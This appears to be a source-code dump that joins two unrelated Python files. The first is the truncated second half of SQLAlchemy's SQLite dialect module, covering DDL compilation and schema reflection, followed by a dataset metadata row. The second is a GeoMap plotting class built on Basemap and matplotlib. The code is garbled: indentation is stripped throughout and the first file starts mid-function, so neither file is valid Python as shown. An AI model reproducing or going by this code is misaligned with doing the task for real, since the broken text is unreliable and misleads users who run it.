colspec += " DEFAULT " + default
if not column.nullable:
colspec += " NOT NULL"
on_conflict_clause = column.dialect_options["sqlite"][
"on_conflict_not_null"
]
if on_conflict_clause is not None:
colspec += " ON CONFLICT " + on_conflict_clause
if column.primary_key:
if (
column.autoincrement is True
and len(column.table.primary_key.columns) != 1
):
raise exc.CompileError(
"SQLite does not support autoincrement for "
"composite primary keys"
)
if (
column.table.dialect_options["sqlite"]["autoincrement"]
and len(column.table.primary_key.columns) == 1
and issubclass(column.type._type_affinity, sqltypes.Integer)
and not column.foreign_keys
):
colspec += " PRIMARY KEY"
on_conflict_clause = column.dialect_options["sqlite"][
"on_conflict_primary_key"
]
if on_conflict_clause is not None:
colspec += " ON CONFLICT " + on_conflict_clause
colspec += " AUTOINCREMENT"
if column.computed is not None:
colspec += " " + self.process(column.computed)
return colspec
def visit_primary_key_constraint(self, constraint):
# for columns with sqlite_autoincrement=True,
# the PRIMARY KEY constraint can only be inline
# with the column itself.
if len(constraint.columns) == 1:
c = list(constraint)[0]
if (
c.primary_key
and c.table.dialect_options["sqlite"]["autoincrement"]
and issubclass(c.type._type_affinity, sqltypes.Integer)
and not c.foreign_keys
):
return None
text = super(SQLiteDDLCompiler, self).visit_primary_key_constraint(
constraint
)
on_conflict_clause = constraint.dialect_options["sqlite"][
"on_conflict"
]
if on_conflict_clause is None and len(constraint.columns) == 1:
on_conflict_clause = list(constraint)[0].dialect_options["sqlite"][
"on_conflict_primary_key"
]
if on_conflict_clause is not None:
text += " ON CONFLICT " + on_conflict_clause
return text
def visit_unique_constraint(self, constraint):
text = super(SQLiteDDLCompiler, self).visit_unique_constraint(
constraint
)
on_conflict_clause = constraint.dialect_options["sqlite"][
"on_conflict"
]
if on_conflict_clause is None and len(constraint.columns) == 1:
col1 = list(constraint)[0]
if isinstance(col1, schema.SchemaItem):
on_conflict_clause = list(constraint)[0].dialect_options[
"sqlite"
]["on_conflict_unique"]
if on_conflict_clause is not None:
text += " ON CONFLICT " + on_conflict_clause
return text
def visit_check_constraint(self, constraint):
text = super(SQLiteDDLCompiler, self).visit_check_constraint(
constraint
)
on_conflict_clause = constraint.dialect_options["sqlite"][
"on_conflict"
]
if on_conflict_clause is not None:
text += " ON CONFLICT " + on_conflict_clause
return text
def visit_column_check_constraint(self, constraint):
text = super(SQLiteDDLCompiler, self).visit_column_check_constraint(
constraint
)
if constraint.dialect_options["sqlite"]["on_conflict"] is not None:
raise exc.CompileError(
"SQLite does not support on conflict clause for "
"column check constraint"
)
return text
def visit_foreign_key_constraint(self, constraint):
local_table = constraint.elements[0].parent.table
remote_table = constraint.elements[0].column.table
if local_table.schema != remote_table.schema:
return None
else:
return super(SQLiteDDLCompiler, self).visit_foreign_key_constraint(
constraint
)
def define_constraint_remote_table(self, constraint, table, preparer):
"""Format the remote table clause of a CREATE CONSTRAINT clause."""
return preparer.format_table(table, use_schema=False)
def visit_create_index(
self, create, include_schema=False, include_table_schema=True
):
index = create.element
self._verify_index_table(index)
preparer = self.preparer
text = "CREATE "
if index.unique:
text += "UNIQUE "
text += "INDEX "
if create.if_not_exists:
text += "IF NOT EXISTS "
text += "%s ON %s (%s)" % (
self._prepared_index_name(index, include_schema=True),
preparer.format_table(index.table, use_schema=False),
", ".join(
self.sql_compiler.process(
expr, include_table=False, literal_binds=True
)
for expr in index.expressions
),
)
whereclause = index.dialect_options["sqlite"]["where"]
if whereclause is not None:
where_compiled = self.sql_compiler.process(
whereclause, include_table=False, literal_binds=True
)
text += " WHERE " + where_compiled
return text
def post_create_table(self, table):
if table.dialect_options["sqlite"]["with_rowid"] is False:
return "\n WITHOUT ROWID"
return ""
class SQLiteTypeCompiler(compiler.GenericTypeCompiler):
def visit_large_binary(self, type_, **kw):
return self.visit_BLOB(type_)
def visit_DATETIME(self, type_, **kw):
if (
not isinstance(type_, _DateTimeMixin)
or type_.format_is_text_affinity
):
return super(SQLiteTypeCompiler, self).visit_DATETIME(type_)
else:
return "DATETIME_CHAR"
def visit_DATE(self, type_, **kw):
if (
not isinstance(type_, _DateTimeMixin)
or type_.format_is_text_affinity
):
return super(SQLiteTypeCompiler, self).visit_DATE(type_)
else:
return "DATE_CHAR"
def visit_TIME(self, type_, **kw):
if (
not isinstance(type_, _DateTimeMixin)
or type_.format_is_text_affinity
):
return super(SQLiteTypeCompiler, self).visit_TIME(type_)
else:
return "TIME_CHAR"
def visit_JSON(self, type_, **kw):
# note this name provides NUMERIC affinity, not TEXT.
# should not be an issue unless the JSON value consists of a single
# numeric value. JSONTEXT can be used if this case is required.
return "JSON"
class SQLiteIdentifierPreparer(compiler.IdentifierPreparer):
reserved_words = set(
[
"add",
"after",
"all",
"alter",
"analyze",
"and",
"as",
"asc",
"attach",
"autoincrement",
"before",
"begin",
"between",
"by",
"cascade",
"case",
"cast",
"check",
"collate",
"column",
"commit",
"conflict",
"constraint",
"create",
"cross",
"current_date",
"current_time",
"current_timestamp",
"database",
"default",
"deferrable",
"deferred",
"delete",
"desc",
"detach",
"distinct",
"drop",
"each",
"else",
"end",
"escape",
"except",
"exclusive",
"exists",
"explain",
"false",
"fail",
"for",
"foreign",
"from",
"full",
"glob",
"group",
"having",
"if",
"ignore",
"immediate",
"in",
"index",
"indexed",
"initially",
"inner",
"insert",
"instead",
"intersect",
"into",
"is",
"isnull",
"join",
"key",
"left",
"like",
"limit",
"match",
"natural",
"not",
"notnull",
"null",
"of",
"offset",
"on",
"or",
"order",
"outer",
"plan",
"pragma",
"primary",
"query",
"raise",
"references",
"reindex",
"rename",
"replace",
"restrict",
"right",
"rollback",
"row",
"select",
"set",
"table",
"temp",
"temporary",
"then",
"to",
"transaction",
"trigger",
"true",
"union",
"unique",
"update",
"using",
"vacuum",
"values",
"view",
"virtual",
"when",
"where",
]
)
class SQLiteExecutionContext(default.DefaultExecutionContext):
@util.memoized_property
def _preserve_raw_colnames(self):
return (
not self.dialect._broken_dotted_colnames
or self.execution_options.get("sqlite_raw_colnames", False)
)
def _translate_colname(self, colname):
# TODO: detect SQLite version 3.10.0 or greater;
# see [ticket:3633]
# adjust for dotted column names. SQLite
# in the case of UNION may store col names as
# "tablename.colname", or if using an attached database,
# "database.tablename.colname", in cursor.description
if not self._preserve_raw_colnames and "." in colname:
return colname.split(".")[-1], colname
else:
return colname, None
class SQLiteDialect(default.DefaultDialect):
name = "sqlite"
supports_alter = False
    # SQLite supports "DEFAULT VALUES" but *does not* support
# "VALUES (DEFAULT)"
supports_default_values = True
supports_default_metavalue = False
supports_empty_insert = False
supports_cast = True
supports_multivalues_insert = True
tuple_in_values = True
supports_statement_cache = True
default_paramstyle = "qmark"
execution_ctx_cls = SQLiteExecutionContext
statement_compiler = SQLiteCompiler
ddl_compiler = SQLiteDDLCompiler
type_compiler = SQLiteTypeCompiler
preparer = SQLiteIdentifierPreparer
ischema_names = ischema_names
colspecs = colspecs
construct_arguments = [
(
sa_schema.Table,
{
"autoincrement": False,
"with_rowid": True,
},
),
(sa_schema.Index, {"where": None}),
(
sa_schema.Column,
{
"on_conflict_primary_key": None,
"on_conflict_not_null": None,
"on_conflict_unique": None,
},
),
(sa_schema.Constraint, {"on_conflict": None}),
]
_broken_fk_pragma_quotes = False
_broken_dotted_colnames = False
@util.deprecated_params(
_json_serializer=(
"1.3.7",
"The _json_serializer argument to the SQLite dialect has "
"been renamed to the correct name of json_serializer. The old "
"argument name will be removed in a future release.",
),
_json_deserializer=(
"1.3.7",
"The _json_deserializer argument to the SQLite dialect has "
"been renamed to the correct name of json_deserializer. The old "
"argument name will be removed in a future release.",
),
)
def __init__(
self,
native_datetime=False,
json_serializer=None,
json_deserializer=None,
_json_serializer=None,
_json_deserializer=None,
**kwargs,
):
default.DefaultDialect.__init__(self, **kwargs)
if _json_serializer:
json_serializer = _json_serializer
if _json_deserializer:
json_deserializer = _json_deserializer
self._json_serializer = json_serializer
self._json_deserializer = json_deserializer
        # this flag is used by the pysqlite dialect, and perhaps others in the
# future, to indicate the driver is handling date/timestamp
# conversions (and perhaps datetime/time as well on some hypothetical
# driver ?)
self.native_datetime = native_datetime
if self.dbapi is not None:
if self.dbapi.sqlite_version_info < (3, 7, 16):
util.warn(
"SQLite version %s is older than 3.7.16, and will not "
"support right nested joins, as are sometimes used in "
"more complex ORM scenarios. SQLAlchemy 1.4 and above "
"no longer tries to rewrite these joins."
% (self.dbapi.sqlite_version_info,)
)
# NOTE: python 3.7 on fedora for me has SQLite 3.34.1. These
# version checks are getting very stale.
self._broken_dotted_colnames = self.dbapi.sqlite_version_info < (
3,
10,
0,
)
self.supports_default_values = self.dbapi.sqlite_version_info >= (
3,
3,
8,
)
self.supports_cast = self.dbapi.sqlite_version_info >= (3, 2, 3)
self.supports_multivalues_insert = (
# https://www.sqlite.org/releaselog/3_7_11.html
self.dbapi.sqlite_version_info
>= (3, 7, 11)
)
# see https://www.sqlalchemy.org/trac/ticket/2568
# as well as https://www.sqlite.org/src/info/600482d161
self._broken_fk_pragma_quotes = self.dbapi.sqlite_version_info < (
3,
6,
14,
)
_isolation_lookup = util.immutabledict(
{"READ UNCOMMITTED": 1, "SERIALIZABLE": 0}
)
def get_isolation_level_values(self, dbapi_connection):
return list(self._isolation_lookup)
def set_isolation_level(self, dbapi_connection, level):
isolation_level = self._isolation_lookup[level]
cursor = dbapi_connection.cursor()
cursor.execute(f"PRAGMA read_uncommitted = {isolation_level}")
cursor.close()
def get_isolation_level(self, dbapi_connection):
cursor = dbapi_connection.cursor()
cursor.execute("PRAGMA read_uncommitted")
res = cursor.fetchone()
if res:
value = res[0]
else:
# https://www.sqlite.org/changes.html#version_3_3_3
# "Optional READ UNCOMMITTED isolation (instead of the
# default isolation level of SERIALIZABLE) and
# table level locking when database connections
            # share a common cache."
            # SQLite versions before 3.3.0 default to 0.
value = 0
cursor.close()
if value == 0:
return "SERIALIZABLE"
elif value == 1:
return "READ UNCOMMITTED"
else:
assert False, "Unknown isolation level %s" % value
@reflection.cache
def get_schema_names(self, connection, **kw):
s = "PRAGMA database_list"
dl = connection.exec_driver_sql(s)
return [db[1] for db in dl if db[1] != "temp"]
@reflection.cache
def get_table_names(self, connection, schema=None, **kw):
if schema is not None:
qschema = self.identifier_preparer.quote_identifier(schema)
master = "%s.sqlite_master" % qschema
else:
master = "sqlite_master"
s = ("SELECT name FROM %s " "WHERE type='table' ORDER BY name") % (
master,
)
rs = connection.exec_driver_sql(s)
return [row[0] for row in rs]
@reflection.cache
def get_temp_table_names(self, connection, **kw):
s = (
"SELECT name FROM sqlite_temp_master "
"WHERE type='table' ORDER BY name "
)
rs = connection.exec_driver_sql(s)
return [row[0] for row in rs]
@reflection.cache
def get_temp_view_names(self, connection, **kw):
s = (
"SELECT name FROM sqlite_temp_master "
"WHERE type='view' ORDER BY name "
)
rs = connection.exec_driver_sql(s)
return [row[0] for row in rs]
def has_table(self, connection, table_name, schema=None):
self._ensure_has_table_connection(connection)
info = self._get_table_pragma(
connection, "table_info", table_name, schema=schema
)
return bool(info)
def _get_default_schema_name(self, connection):
return "main"
@reflection.cache
def get_view_names(self, connection, schema=None, **kw):
if schema is not None:
qschema = self.identifier_preparer.quote_identifier(schema)
master = "%s.sqlite_master" % qschema
else:
master = "sqlite_master"
s = ("SELECT name FROM %s " "WHERE type='view' ORDER BY name") % (
master,
)
rs = connection.exec_driver_sql(s)
return [row[0] for row in rs]
@reflection.cache
def get_view_definition(self, connection, view_name, schema=None, **kw):
if schema is not None:
qschema = self.identifier_preparer.quote_identifier(schema)
master = "%s.sqlite_master" % qschema
s = ("SELECT sql FROM %s WHERE name = ? AND type='view'") % (
master,
)
rs = connection.exec_driver_sql(s, (view_name,))
else:
try:
s = (
"SELECT sql FROM "
" (SELECT * FROM sqlite_master UNION ALL "
" SELECT * FROM sqlite_temp_master) "
"WHERE name = ? "
"AND type='view'"
)
rs = connection.exec_driver_sql(s, (view_name,))
except exc.DBAPIError:
s = (
"SELECT sql FROM sqlite_master WHERE name = ? "
"AND type='view'"
)
rs = connection.exec_driver_sql(s, (view_name,))
result = rs.fetchall()
if result:
return result[0].sql
@reflection.cache
def get_columns(self, connection, table_name, schema=None, **kw):
pragma = "table_info"
        # computed columns are treated as hidden; they require table_xinfo
if self.server_version_info >= (3, 31):
pragma = "table_xinfo"
info = self._get_table_pragma(
connection, pragma, table_name, schema=schema
)
columns = []
tablesql = None
for row in info:
name = row[1]
type_ = row[2].upper()
nullable = not row[3]
default = row[4]
primary_key = row[5]
hidden = row[6] if pragma == "table_xinfo" else 0
# hidden has value 0 for normal columns, 1 for hidden columns,
# 2 for computed virtual columns and 3 for computed stored columns
# https://www.sqlite.org/src/info/069351b85f9a706f60d3e98fbc8aaf40c374356b967c0464aede30ead3d9d18b
if hidden == 1:
continue
generated = bool(hidden)
persisted = hidden == 3
if tablesql is None and generated:
tablesql = self._get_table_sql(
connection, table_name, schema, **kw
)
columns.append(
self._get_column_info(
name,
type_,
nullable,
default,
primary_key,
generated,
persisted,
tablesql,
)
)
return columns
def _get_column_info(
self,
name,
type_,
nullable,
default,
primary_key,
generated,
persisted,
tablesql,
):
if generated:
# the type of a column "cc INTEGER GENERATED ALWAYS AS (1 + 42)"
# somehow is "INTEGER GENERATED ALWAYS"
type_ = re.sub("generated", "", type_, flags=re.IGNORECASE)
type_ = re.sub("always", "", type_, flags=re.IGNORECASE).strip()
coltype = self._resolve_type_affinity(type_)
if default is not None:
default = str(default)
colspec = {
"name": name,
"type": coltype,
"nullable": nullable,
"default": default,
"autoincrement": "auto",
"primary_key": primary_key,
}
if generated:
sqltext = ""
if tablesql:
pattern = r"[^,]*\s+AS\s+\(([^,]*)\)\s*(?:virtual|stored)?"
match = re.search(
re.escape(name) + pattern, tablesql, re.IGNORECASE
)
if match:
sqltext = match.group(1)
colspec["computed"] = {"sqltext": sqltext, "persisted": persisted}
return colspec
def _resolve_type_affinity(self, type_):
"""Return a data type from a reflected column, using affinity rules.
SQLite's goal for universal compatibility introduces some complexity
during reflection, as a column's defined type might not actually be a
        type that SQLite understands - or indeed, may not be defined *at all*.
Internally, SQLite handles this with a 'data type affinity' for each
column definition, mapping to one of 'TEXT', 'NUMERIC', 'INTEGER',
'REAL', or 'NONE' (raw bits). The algorithm that determines this is
listed in https://www.sqlite.org/datatype3.html section 2.1.
This method allows SQLAlchemy to support that algorithm, while still
providing access to smarter reflection utilities by recognizing
column definitions that SQLite only supports through affinity (like
DATE and DOUBLE).
"""
match = re.match(r"([\w ]+)(\(.*?\))?", type_)
if match:
coltype = match.group(1)
args = match.group(2)
else:
coltype = ""
args = ""
if coltype in self.ischema_names:
coltype = self.ischema_names[coltype]
elif "INT" in coltype:
coltype = sqltypes.INTEGER
elif "CHAR" in coltype or "CLOB" in coltype or "TEXT" in coltype:
coltype = sqltypes.TEXT
elif "BLOB" in coltype or not coltype:
coltype = sqltypes.NullType
elif "REAL" in coltype or "FLOA" in coltype or "DOUB" in coltype:
coltype = sqltypes.REAL
else:
coltype = sqltypes.NUMERIC
if args is not None:
args = re.findall(r"(\d+)", args)
try:
coltype = coltype(*[int(a) for a in args])
except TypeError:
util.warn(
"Could not instantiate type %s with "
"reflected arguments %s; using no arguments."
% (coltype, args)
)
coltype = coltype()
else:
coltype = coltype()
return coltype
@reflection.cache
def get_pk_constraint(self, connection, table_name, schema=None, **kw):
constraint_name = None
table_data = self._get_table_sql(connection, table_name, schema=schema)
if table_data:
PK_PATTERN = r"CONSTRAINT (\w+) PRIMARY KEY"
result = re.search(PK_PATTERN, table_data, re.I)
constraint_name = result.group(1) if result else None
cols = self.get_columns(connection, table_name, schema, **kw)
cols.sort(key=lambda col: col.get("primary_key"))
pkeys = []
for col in cols:
if col["primary_key"]:
pkeys.append(col["name"])
return {"constrained_columns": pkeys, "name": constraint_name}
@reflection.cache
def get_foreign_keys(self, connection, table_name, schema=None, **kw):
# sqlite makes this *extremely difficult*.
# First, use the pragma to get the actual FKs.
pragma_fks = self._get_table_pragma(
connection, "foreign_key_list", table_name, schema=schema
)
fks = {}
for row in pragma_fks:
(numerical_id, rtbl, lcol, rcol) = (row[0], row[2], row[3], row[4])
if not rcol:
# no referred column, which means it was not named in the
# original DDL. The referred columns of the foreign key
# constraint are therefore the primary key of the referred
# table.
referred_pk = self.get_pk_constraint(
connection, rtbl, schema=schema, **kw
)
                # note that if the table doesn't exist, we still get back a
                # record, it just has no columns in it
referred_columns = referred_pk["constrained_columns"]
else:
# note we use this list only if this is the first column
# in the constraint. for subsequent columns we ignore the
# list and append "rcol" if present.
referred_columns = []
if self._broken_fk_pragma_quotes:
rtbl = re.sub(r"^[\"\[`\']|[\"\]`\']$", "", rtbl)
if numerical_id in fks:
fk = fks[numerical_id]
else:
fk = fks[numerical_id] = {
"name": None,
"constrained_columns": [],
"referred_schema": schema,
"referred_table": rtbl,
"referred_columns": referred_columns,
"options": {},
}
fks[numerical_id] = fk
fk["constrained_columns"].append(lcol)
if rcol:
fk["referred_columns"].append(rcol)
def fk_sig(constrained_columns, referred_table, referred_columns):
return (
tuple(constrained_columns)
+ (referred_table,)
+ tuple(referred_columns)
)
# then, parse the actual SQL and attempt to find DDL that matches
# the names as well. SQLite saves the DDL in whatever format
        # it was typed in as, so we need to be liberal here.
keys_by_signature = dict(
(
fk_sig(
fk["constrained_columns"],
fk["referred_table"],
fk["referred_columns"],
),
fk,
)
for fk in fks.values()
)
table_data = self._get_table_sql(connection, table_name, schema=schema)
if table_data is None:
# system tables, etc.
return []
def parse_fks():
FK_PATTERN = (
r"(?:CONSTRAINT (\w+) +)?"
r"FOREIGN KEY *\( *(.+?) *\) +"
r'REFERENCES +(?:(?:"(.+?)")|([a-z0-9_]+)) *\((.+?)\) *'
r"((?:ON (?:DELETE|UPDATE) "
r"(?:SET NULL|SET DEFAULT|CASCADE|RESTRICT|NO ACTION) *)*)"
)
for match in re.finditer(FK_PATTERN, table_data, re.I):
(
constraint_name,
constrained_columns,
referred_quoted_name,
referred_name,
referred_columns,
onupdatedelete,
) = match.group(1, 2, 3, 4, 5, 6)
constrained_columns = list(
self._find_cols_in_sig(constrained_columns)
)
if not referred_columns:
referred_columns = constrained_columns
else:
referred_columns = list(
self._find_cols_in_sig(referred_columns)
)
referred_name = referred_quoted_name or referred_name
options = {}
for token in re.split(r" *\bON\b *", onupdatedelete.upper()):
if token.startswith("DELETE"):
ondelete = token[6:].strip()
if ondelete and ondelete != "NO ACTION":
options["ondelete"] = ondelete
elif token.startswith("UPDATE"):
onupdate = token[6:].strip()
if onupdate and onupdate != "NO ACTION":
options["onupdate"] = onupdate
yield (
constraint_name,
constrained_columns,
referred_name,
referred_columns,
options,
)
fkeys = []
for (
constraint_name,
constrained_columns,
referred_name,
referred_columns,
options,
) in parse_fks():
sig = fk_sig(constrained_columns, referred_name, referred_columns)
if sig not in keys_by_signature:
util.warn(
"WARNING: SQL-parsed foreign key constraint "
"'%s' could not be located in PRAGMA "
"foreign_keys for table %s" % (sig, table_name)
)
continue
key = keys_by_signature.pop(sig)
key["name"] = constraint_name
key["options"] = options
fkeys.append(key)
        # assume the remainders are the unnamed, inline constraints; just
        # use them as-is, as it's extremely difficult to parse inline
        # constraints
fkeys.extend(keys_by_signature.values())
return fkeys
def _find_cols_in_sig(self, sig):
for match in re.finditer(r'(?:"(.+?)")|([a-z0-9_]+)', sig, re.I):
yield match.group(1) or match.group(2)
@reflection.cache
def get_unique_constraints(
self, connection, table_name, schema=None, **kw
):
auto_index_by_sig = {}
for idx in self.get_indexes(
connection,
table_name,
schema=schema,
include_auto_indexes=True,
**kw,
):
if not idx["name"].startswith("sqlite_autoindex"):
continue
sig = tuple(idx["column_names"])
auto_index_by_sig[sig] = idx
table_data = self._get_table_sql(
connection, table_name, schema=schema, **kw
)
if not table_data:
return []
unique_constraints = []
def parse_uqs():
UNIQUE_PATTERN = r'(?:CONSTRAINT "?(.+?)"? +)?UNIQUE *\((.+?)\)'
INLINE_UNIQUE_PATTERN = (
r'(?:(".+?")|(?:[\[`])?([a-z0-9_]+)(?:[\]`])?) '
r"+[a-z0-9_ ]+? +UNIQUE"
)
for match in re.finditer(UNIQUE_PATTERN, table_data, re.I):
name, cols = match.group(1, 2)
yield name, list(self._find_cols_in_sig(cols))
# we need to match inlines as well, as we seek to differentiate
# a UNIQUE constraint from a UNIQUE INDEX, even though these
# are kind of the same thing :)
for match in re.finditer(INLINE_UNIQUE_PATTERN, table_data, re.I):
cols = list(
self._find_cols_in_sig(match.group(1) or match.group(2))
)
yield None, cols
for name, cols in parse_uqs():
sig = tuple(cols)
if sig in auto_index_by_sig:
auto_index_by_sig.pop(sig)
parsed_constraint = {"name": name, "column_names": cols}
unique_constraints.append(parsed_constraint)
# NOTE: auto_index_by_sig might not be empty here,
# the PRIMARY KEY may have an entry.
return unique_constraints
@reflection.cache
def get_check_constraints(self, connection, table_name, schema=None, **kw):
table_data = self._get_table_sql(
connection, table_name, schema=schema, **kw
)
if not table_data:
return []
CHECK_PATTERN = r"(?:CONSTRAINT (\w+) +)?" r"CHECK *\( *(.+) *\),? *"
check_constraints = []
# NOTE: we aren't using re.S here because we actually are
# taking advantage of each CHECK constraint being all on one
# line in the table definition in order to delineate. This
# necessarily makes assumptions as to how the CREATE TABLE
# was emitted.
for match in re.finditer(CHECK_PATTERN, table_data, re.I):
check_constraints.append(
{"sqltext": match.group(2), "name": match.group(1)}
)
return check_constraints
@reflection.cache
def get_indexes(self, connection, table_name, schema=None, **kw):
pragma_indexes = self._get_table_pragma(
connection, "index_list", table_name, schema=schema
)
indexes = []
include_auto_indexes = kw.pop("include_auto_indexes", False)
for row in pragma_indexes:
# ignore implicit primary key index.
# https://www.mail-archive.com/[email protected]/msg30517.html
if not include_auto_indexes and row[1].startswith(
"sqlite_autoindex"
):
continue
indexes.append(dict(name=row[1], column_names=[], unique=row[2]))
        # loop through the indexes to get the column names.
for idx in list(indexes):
pragma_index = self._get_table_pragma(
connection, "index_info", idx["name"]
)
for row in pragma_index:
if row[2] is None:
util.warn(
"Skipped unsupported reflection of "
"expression-based index %s" % idx["name"]
)
indexes.remove(idx)
break
else:
idx["column_names"].append(row[2])
return indexes
@reflection.cache
def _get_table_sql(self, connection, table_name, schema=None, **kw):
if schema:
schema_expr = "%s." % (
self.identifier_preparer.quote_identifier(schema)
)
else:
schema_expr = ""
try:
s = (
"SELECT sql FROM "
" (SELECT * FROM %(schema)ssqlite_master UNION ALL "
" SELECT * FROM %(schema)ssqlite_temp_master) "
"WHERE name = ? "
"AND type = 'table'" % {"schema": schema_expr}
)
rs = connection.exec_driver_sql(s, (table_name,))
except exc.DBAPIError:
s = (
"SELECT sql FROM %(schema)ssqlite_master "
"WHERE name = ? "
"AND type = 'table'" % {"schema": schema_expr}
)
rs = connection.exec_driver_sql(s, (table_name,))
return rs.scalar()
def _get_table_pragma(self, connection, pragma, table_name, schema=None):
quote = self.identifier_preparer.quote_identifier
if schema is not None:
statements = ["PRAGMA %s." % quote(schema)]
else:
            # because PRAGMA looks in all attached databases if no schema is
            # given, we need to specify the "main" schema; however, since we
            # want 'temp' tables in the same namespace as 'main', we need to
            # run the PRAGMA twice
statements = ["PRAGMA main.", "PRAGMA temp."]
qtable = quote(table_name)
for statement in statements:
statement = "%s%s(%s)" % (statement, pragma, qtable)
cursor = connection.exec_driver_sql(statement)
if not cursor._soft_closed:
# work around SQLite issue whereby cursor.description
# is blank when PRAGMA returns no rows:
# https://www.sqlite.org/cvstrac/tktview?tn=1884
result = cursor.fetchall()
else:
result = []
if result:
return result
else:
return []
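# ---------------------------------------------------------------------------
# Illustrative usage sketch (not part of the dialect implementation): the
# reflection methods above are normally reached through SQLAlchemy's public
# Inspector API rather than called directly.  The database file and table
# name below are hypothetical.
#
#     from sqlalchemy import create_engine, inspect
#
#     engine = create_engine("sqlite:///example.db")
#     insp = inspect(engine)
#     insp.get_table_names()              # -> SQLiteDialect.get_table_names()
#     insp.get_columns("some_table")      # -> SQLiteDialect.get_columns()
#     insp.get_foreign_keys("some_table") # -> SQLiteDialect.get_foreign_keys()
# ---------------------------------------------------------------------------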
| 34.656669 | 110 | 0.599601 | [
"MIT"
] | aalvrz/sqlalchemy | lib/sqlalchemy/dialects/sqlite/base.py | 87,820 | Python |
#!/usr/bin/env python
# -*- coding: utf-8 -*-
#
from mpl_toolkits.basemap import Basemap
import matplotlib.pyplot as plt
import matplotlib.cm as cm
import numpy as np
#-----------------------------------------------------------------------------------------
class GeoMap:
'''
INFO:
Map boundary edges order:
[LeftLowerLon,LeftLowerLat,UpperRightLon,UpperRightLat]
Background type:
'none'
'etopo'
'esri' --> background source
Background sources available for 'esri':
ESRI_Imagery_World_2D (MapServer)
ESRI_StreetMap_World_2D (MapServer)
I3_Imagery_Prime_World (GlobeServer)
NASA_CloudCover_World (GlobeServer)
NatGeo_World_Map (MapServer)
NGS_Topo_US_2D (MapServer)
Ocean_Basemap (MapServer)
USA_Topo_Maps (MapServer)
World_Imagery (MapServer)
World_Physical_Map (MapServer)
World_Shaded_Relief (MapServer)
World_Street_Map (MapServer)
World_Terrain_Base (MapServer)
World_Topo_Map (MapServer)
'''
#---------------------------------------------------------------------------------------
def __init__(self, Cfg=[]):
# Defaults (example setting)
if not Cfg:
self._cfg = {'Bounds': [7., 36., 19., 48.],
'FigSize': [6., 6.],
'Background': ['esri','World_Terrain_Base',1500],
'Grid': [5., 5.]}
else:
self._cfg = Cfg
self._zo = 1
#---------------------------------------------------------------------------------------
def BasePlot(self):
plt.figure(figsize = (self._cfg['FigSize'][0],
self._cfg['FigSize'][1]))
# Basemap
self._map = Basemap(self._cfg['Bounds'][0],
self._cfg['Bounds'][1],
self._cfg['Bounds'][2],
self._cfg['Bounds'][3],
resolution = 'l',
projection = 'tmerc',
epsg = 3857)
# Background land
if self._cfg['Background'][0] == 'color':
self._map.drawlsmask(land_color = self._cfg['Background'][1],
ocean_color = self._cfg['Background'][2],
grid = 1.25,
lakes = True)
if self._cfg['Background'][0] == 'etopo':
self._map.etopo(zorder = self._zo)
if self._cfg['Background'][0] == 'esri':
self._map.arcgisimage(service = self._cfg['Background'][1],
xpixels = self._cfg['Background'][2],
dpi = 300,
zorder = self._zo)
if self._cfg['Background'][0] == 'relief':
self._map.shadedrelief()
#---------------------------------------------------------------------------------------
def DrawGrid(self):
# Parallels and meridians
parallels = np.arange(-90, 90, self._cfg['Grid'][1])
meridians = np.arange(0, 360., self._cfg['Grid'][0])
self._zo += 1
self._map.drawparallels(parallels, labels = [1,0,0,0],
fontsize = 14, weight = 'normal',
linewidth = 0.5,
zorder = self._zo)
self._zo += 1
self._map.drawmeridians(meridians, labels = [0,0,0,1],
fontsize = 14, weight = 'normal',
linewidth = 0.5,
zorder = self._zo)
#---------------------------------------------------------------------------------------
def DrawBounds(self):
# Boundaries and lines
self._zo += 1
self._map.drawcoastlines(linewidth = 0.8,
zorder = self._zo)
self._zo += 1
self._map.drawstates(linewidth = 0.8,
zorder = self._zo)
self._zo += 1
self._map.drawcountries(linewidth = 0.8,
zorder = self._zo)
self._zo += 1
self._map.drawrivers(linewidth = 0.1,
color = 'b',
zorder = self._zo)
"""
self._zo += 1
self._map.drawmapboundary(linewidth = 2,
color = 'k',
zorder = self._zo)
"""
#---------------------------------------------------------------------------------------
def Title(self, string, Set=['bold','k',18]):
plt.title(string, weight = Set[0],
color = Set[1],
fontsize = Set[2])
#---------------------------------------------------------------------------------------
def PointPlot(self, Lon, Lat, Label=[], Set=['o','y',5,1]):
x, y = self._map(Lon, Lat)
self._zo += 1
self._map.plot(x, y, Set[0],
color = Set[1],
markersize = Set[2],
markeredgewidth = Set[3],
label = Label,
zorder = self._zo)
#---------------------------------------------------------------------------------------
def LabelPlot(self, Lon, Lat, Label, Set=['normal','k',14]):
x, y = self._map(Lon, Lat)
# If only one label provided, convert to list
if isinstance(Label, str):
x = [x]
y = [y]
Label = [Label]
self._zo += 1
for i, string in enumerate(Label):
plt.text(x[i], y[i], string, weight = Set[0],
color = Set[1],
fontsize = Set[2],
zorder = self._zo)
#---------------------------------------------------------------------------------------
def AreaPlot(self, Lon, Lat, Set=['y',1,'k',1]):
x, y = self._map(Lon, Lat)
if Set[0]:
self._zo += 1
plt.fill(x, y, color = Set[0],
alpha = Set[1],
zorder = self._zo)
if Set[2]:
self._zo += 1
plt.plot(x, y, Set[2],
linewidth = Set[3],
zorder = self._zo)
#---------------------------------------------------------------------------------------
def MeshPlot(self, Lon, Lat, Elev, Cmap=[], Clim=[], Mesh=True):
from matplotlib.colors import BoundaryNorm
from matplotlib.ticker import MaxNLocator
x, y = self._map(Lon, Lat)
z = Elev
if not Cmap:
Cmap = cm.jet
# cmap.set_under('w', alpha=0.)
if not Clim:
Clim = [z.min(), z.max()]
levels = MaxNLocator(nbins=16).tick_values(Clim[0], Clim[1])
norm = BoundaryNorm(levels, ncolors = Cmap.N, clip=True)
if not Mesh:
self._zo += 1
h = plt.scatter(x, y, c = z,
s = 20,
marker = 's',
cmap = Cmap,
vmin = Clim[0],
vmax = Clim[1],
lw = 0,
alpha = 1.,
zorder = self._zo)
else:
self._zo += 1
z = z[:-1, :-1]
h = plt.pcolormesh(x, y, z, cmap = Cmap,
norm = norm,
vmin = Clim[0],
vmax = Clim[1],
lw = 0,
alpha = 1.,
zorder = self._zo)
clb = plt.gcf().colorbar(h, orientation = 'vertical')
clb.outline.set_linewidth(1)
clb.ax.tick_params(labelsize=14)
clb.set_label('Spectral Acceleration ($g$)', size=12)
#---------------------------------------------------------------------------------------
def ShapeFile(self, ShpFile, Name, Color='k'):
# NOTE: this doesn't always work with polygons,
# better to use the function in crd_tool
self._zo += 1
self._map.readshapefile(ShpFile,
Name,
linewidth = 1.5,
drawbounds = True,
color = Color,
zorder = self._zo)
